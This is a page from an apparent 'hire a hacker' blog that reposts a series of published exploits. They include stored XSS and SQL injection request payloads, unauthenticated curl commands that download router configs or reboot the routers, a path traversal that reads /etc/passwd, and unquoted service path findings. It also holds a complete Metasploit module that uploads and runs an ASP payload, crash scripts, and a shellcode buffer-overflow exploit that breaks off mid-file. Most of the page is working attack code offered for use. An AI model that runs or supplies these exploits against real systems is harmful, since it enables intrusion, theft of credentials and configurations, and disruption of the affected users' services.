Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863152443

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting 
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.

# One
POST /pos_inv/admin/addcustomer.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
Content-Length: 661
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/customer.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="name"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="address"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="contact"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="username"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="password"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741--




# Two 
http://127.0.0.1/pos_inv/admin/supplier.php

POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/supplier.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa




# Three
http://127.0.0.1/pos_inv/admin/product.php

POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
Content-Length: 844
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/product.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="name"

ACER Aspire GX-781 Gaming PC <script>alert(1)</script>
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="category"

2
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="supplier"

0
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="price"

749.99
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="qty"

1000
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------11435260685310908573266876009--
HireHackking 
# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Steps
# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt


---
Parameter: MULTIPART name ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="name"

aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="category"

1
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="price"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="qty"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------15280280330873390203691218429--
---
HireHackking 
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the export_settings.cgi file
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5644
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php


03.02.2021

--


$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb  4 11:31 config.dat
HireHackking 
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version:  Model | Firmware
                  -------|---------
                 JT3500V | 2.0.1B1064
                 JT3300V | 2.0.1B1047
                 AM6200M | 2.0.0B3210
                 AM6000N | 2.0.0B3042
                 AM5000W | 2.0.0B3037
                 AM4200M | 2.0.0B2996
                 AM4100V | 2.0.0B2988
                AM3500MW | 2.0.0B1092
                 AM3410V | 2.0.0B1085
                 AM3300V | 2.0.0B1060
                 AM3100E | 2.0.0B981
                 AM3100V | 2.0.0B946
                 AM3000M | 2.0.0B21
                 KZ7621U | 2.0.0B14
                 KZ3220M | 2.0.0B04
                 KZ3120R | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.

Desc: The device allows unauthenticated attackers to restart the
device with an HTTP GET request to /goform/RestartDevice page.

Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5643
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php


03.02.2021

--


$ curl -sk https://192.168.1.1/goform/RestartDevice
success
$
HireHackking

Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths

HACKER · %s · %s

# Exploit Title: Vembu BDR 4.2.0.1 U1 - Multiple Unquoted Service Paths # Date: 2020-11-6 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://www.vembu.com/ # Software Link: https://sg-build-release.s3.amazonaws.com/BDRSuite/V420/4202020051312/Vembu_BDR_Backup_Server_Setup_4_2_0_1_U1_GA.exe # Version: Version 4.2.0.1 U1 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc "hsflowd" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: hsflowd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\hsflowd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Host_sFlow_Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507>sc qc "VembuBDR360Agent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VembuBDR360Agent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuBDR360Agent\bin\VembuBDR360Agent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VembuBDR360Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507>sc qc "VembuOffice365Agent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VembuOffice365Agent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Vembu\VembuBDR\..\VembuOffice365Agent\bin\VembuOffice365Agent.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VembuOffice365Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
HireHackking

QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path

HACKER · %s · %s

# Exploit Title: QNAP QVR Client 5.0.0.13230 - 'QVRService' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.qnap.com # Tested Version: 5.0.0.13230 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "QVR" | findstr /i /v """ QVRService QVRService C:\Program Files (x86)\QNAP\QVR\QVRService.exe Auto # Service info: C:\>sc qc "QVRService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: QVRService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\QNAP\QVR\QVRService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : QVRService DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking

rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)

HACKER · %s · %s

# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated) # Date: 2021-03-12 # Exploit Author: 5a65726f # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip # Version: rConfig v3.9.6 # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Tested on: centOS 7 # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # Description: rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path. ajaxGetFileByPath.php allows authenticated users to download any file on the server. The following steps can be carried out in duplicating this vulnerability. - Login the rConfig application with your credentials. - Enter the following link to your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd
HireHackking
# Exploit Title: eBeam education suite 2.5.0.9 - 'eBeam Device Service' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2021-03-14 # Vendor Homepage: https://www.luidia.com # Tested Version: 2.5.0.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\ Windows\\" | findstr /i "eBeam" | findstr /i /v """ eBeam Device Service eBeam Device Service C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMain.exe Auto # Service info: C:\>sc qc "eBeam Device Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: eBeam Device Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Luidia\eBeam Device Service\eBeamDeviceServiceMa in.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : eBeam Device Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: openMAINT openMAINT 2.1-3.3-b - 'Multiple' Persistent Cross-Site Scripting # Date: 13/03/2021 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.openmaint.org/ # Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/ # Version: 2.1-3.3 # Tested on: Linux # CVE: CVE-2021-27695 Summary: Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any "Add" sections, such as Add Card Building & Floor, or others in the Name And Code Parameters. Proof of concepts : 1-Login to you'r Dashboard As a low privilege user 2-Click On Facilities and assets - Location - Sites 3- +Add card Building 4- Code and name parameters both are vulnerable POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json ..... Cookie: ... {"_type":"Building","_tenant":"","Code":"\"><img src=code onmouseover=alert(1)>","Description":null,"Name":"\"><img src=name onmouseover=alert(1)>",....} The Xss will trigger in that form, and also if you click on "Map" button , the xss will trigger there ------------------------------------------------------------------------ Another Xss : 1-Like above in Facilities click on Locations and click on complex 2-click + Add card Complex 3-insert javascript payload to Code And Name POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json .... Connection: close Referer: Cookie: .... {"_type":"Complex","_tenant":"","Code":"\"><img src=complex onmouseover=alert(1)>","Description":null,"Name":"\"><img src=complex onmouseover=alert(1)>",...} 4-Save it 5-Back to Sites and click on previous card 6- in position section click on "Complex" drop down 7- xss will trigger ------------------------------------------------------------------------ Another Xss: 1-Like exmaples above go to Locations and click on Sites 2-Add Card Building or click the one you created before 3-in left menu click on "Relations" 4-click "Add relations" and select one of the options 5- Add Card and select one of the options 6- insert javascript payload to code and name parameter POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"","_tenant":"","Code":"\"><img src=add relation onmouseover=alert(3)>","Name":"\"><img src=add relation onmouseover=alert(3)>","Description":null,..... } 7- save it and close the form 8-click on the card and there an option which is "Open Relation Graph" click on it and click on card list 9- xss payload will trigger ------------------------------------------------------ Another Xss: 1- In "Navigation" Bar click on "Configurations" 2- Click on parameter 3- + Add card Parameter 4- Insert javascript payload to Code and Value PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 {"_type":"Parameter","_tenant":"","Area":null,"Code":"--'\"><img src=cardparameter onmouseover=alert(4)>","Description":null,"Value":"--'\"><img src=cardparameter onmouseover=alert(5)>",....} save it and like the previous one click on "Open Relation Graph" and in card List your xss will trigger ------------------------------------------------------- Another Xss: 1-Click Facilities and assets 2-Locations 3-Select one of cards 4-Click "Add Card" 5-in "Attachments" tab click "Add attachment" select "Document" or "image" 6-insert javascript payload in "Code" and "Description" PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate CMDBuild-ActionId: class.card.attachments.open CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8 Content-Type: multipart/form-data; boundary=---------------------------1049383330380851725139941543 Content-Length: 1020 Connection: close Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578 -----------------------------1049383330380851725139941543 Content-Disposition: form-data; name="attachment"; filename="blob" Content-Type: application/json {"_....."Code":"--'\"><img src=attach onmouseover=alert(7)>","Description":"--'\"><img src=attach onmouseover=alert(7)>","...} -----------------------------1049383330380851725139941543-- 7-save it and xss will trigger
HireHackking
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'SonLogger Arbitrary File Upload Exploit', 'Description' => %q{ This module exploits an unauthenticated arbitrary file upload via insecure POST request. It has been tested on version < 6.4.1 in Windows 10 Enterprise. }, 'License' => MSF_LICENSE, 'Author' => [ 'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module ], 'References' => [ ['CVE', '2021-27964'], ['URL', 'https://erberkan.github.io/2021/SonLogger-vulns/'] ], 'Platform' => ['win'], 'Privileged' => false, 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'SonLogger < 6.4.1', { 'Platform' => 'win' } ], ], 'DisclosureDate' => '2021-03-01', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000), OptString.new('TARGETURI', [true, 'The base path to the SonLogger', '/']) ] ) end def check_product_info send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'), 'method' => 'POST', 'data' => '', 'headers' => { 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest' } ) end def check begin res = check_product_info unless res return CheckCode::Unknown('Target is unreachable.') end unless res.code == 200 return CheckCode::Unknown("Unexpected server response: #{res.code}") end version = Gem::Version.new(JSON.parse(res.body)['Version']) if version < Gem::Version.new('6.4.1') CheckCode::Vulnerable("SonLogger version #{version}") else CheckCode::Safe("SonLogger version #{version}") end rescue JSON::ParserError fail_with(Failure::UnexpectedReply, 'The target may have been updated') end end def create_payload Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s end def exploit begin print_good('Generate Payload') data = create_payload boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}" post_data = "--#{boundary}\r\n" post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n" post_data << "Content-Type: image/png\r\n" post_data << "\r\n#{data}\r\n" post_data << "--#{boundary}\r\n" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data, 'headers' => { 'Accept' => 'application/json', 'Accept-Language' => 'en-US,en;q=0.5', 'X-Requested-With' => 'XMLHttpRequest' } ) unless res fail_with(Failure::Unreachable, 'No response from server') end unless res.code == 200 fail_with(Failure::Unknown, "Unexpected server response: #{res.code}") end json_res = begin JSON.parse(res.body) rescue JSON::ParserError nil end if json_res.nil? || json_res['Message'] == 'Error in saving file' fail_with(Failure::UnexpectedReply, 'Error uploading payload') end print_good('Payload has been uploaded') handler print_status('Executing payload...') send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'), 'method' => 'GET' }, 5) end rescue StandardError fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') end end
HireHackking
# Exploit Title: GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 6.0.631.0-offlinegraphing # Tested on: Windows 8.1 Pro # STEPS # Open the program Graficadora # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the field "Entrada..." # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
HireHackking

GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC) # Date: 2021-03-15 # Exploit Author: Brian Rodriguez # Vendor Homepage: https://www.geogebra.org # Software Link: https://www.geogebra.org/download # Version: 6.0.631.0-offlinecas # Tested on: Windows 8.1 Pro # STEPS # Open the program Calculadora CAS # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the field "Entrada..." # Crashed --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 8000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
HireHackking

VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS

HACKER · %s · %s

# Title: VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS # Date: 07.03.2021 # Author: Numan Türle # Vendor Homepage: https://vestacp.com # Software Link: https://myvestacp.com < 0.9.8-26-43 # Software Link: https://vestacp.com < 0.9.8-26 # Tested on: VestaCP POST /add/ip/ HTTP/1.1 Host: TARGET:8083 Connection: close Content-Length: 165 Cache-Control: max-age=0 Origin: https://TARGET:8083 Content-Type: application/x-www-form-urlencoded User-Agent: USER-AGENT Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: https://TARGET:8083/add/ip/ Accept-Encoding: gzip, deflate Accept-Language: en,tr-TR; Cookie: PHPSESSID=udiudv2k0707d6k3p3fi1n1qk0 sec-gpc: 1 token=04331c937aeb2d203889b3fb86fa75b2&ok=Add&v_ip=90.7.3.1&v_netmask=255.0.0.0&v_interface=<script>alert(1)</script>&v_shared=on&v_owner=admin&v_name=&v_nat=&ok=Add
HireHackking
# Exploit title: FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass) # Exploit Author: Paolo Stagno # Date: 15/03/2020 # Vendor Homepage: https://www.faststone.org/ # Download: https://www.faststonesoft.net/DN/FSViewerSetup75.exe # https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86/local/FastStone_Image_Viewer_v.7.5/ # Version: 7.5 # Tested on: Windows 10 Pro x64 v.1909 Build 18363.1256 # Category: local exploit # Platform: windows # Module info : #---------------------------------------------------------------------------------------------------------------------- #Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path #---------------------------------------------------------------------------------------------------------------------- #0x00400000 | 0x00abf000 | 0x006bf000 | False | False | False | False | False | 7.5.0.0 [FSViewer.exe] (C:\Program Files (x86)\FastStone Image Viewer\FSViewer.exe) #0x6ad80000 | 0x6adfe000 | 0x0007e000 | False | False | False | False | False | -1.0- [fsplugin05.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin05.dll) #0x6afb0000 | 0x6b011000 | 0x00061000 | True | True | False | False | False | -1.0- [fsplugin06.dll] (C:\Program Files (x86)\FastStone Image Viewer\fsplugin06.dll) #---------------------------------------------------------------------------------------------------------------------- #!/usr/bin/python import struct, sys print("\n[>] FastStone Image Viewer v. <= 7.5 Exploit by VoidSec\n") filename="FSViewer_v.7.5_exploit.cur" ################################################################################### # Shellcode # MAX Shellcode size: 556 # ImageData - ROP NOP - Rop Chain - Stack Adjustment = 776 - 144 - 68 - 8 = 556 # Custom calc.exe shellcode # size: 112 ################################################################################### shellcode=( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" "\x57\x78\x01\xc2\x8b\x7a\x20\x01" "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" "\x45\x81\x3e\x43\x72\x65\x61\x75" "\xf2\x81\x7e\x08\x6f\x63\x65\x73" "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" "\xb1\xff\x53\xe2\xfd\x68\x63\x61" "\x6c\x63\x89\xe2\x52\x52\x53\x53" "\x53\x53\x53\x53\x52\x53\xff\xd7" ) if (len(shellcode)>556): sys.exit("Shellcode's size must be <= 556 bytes") ################################################################################### # 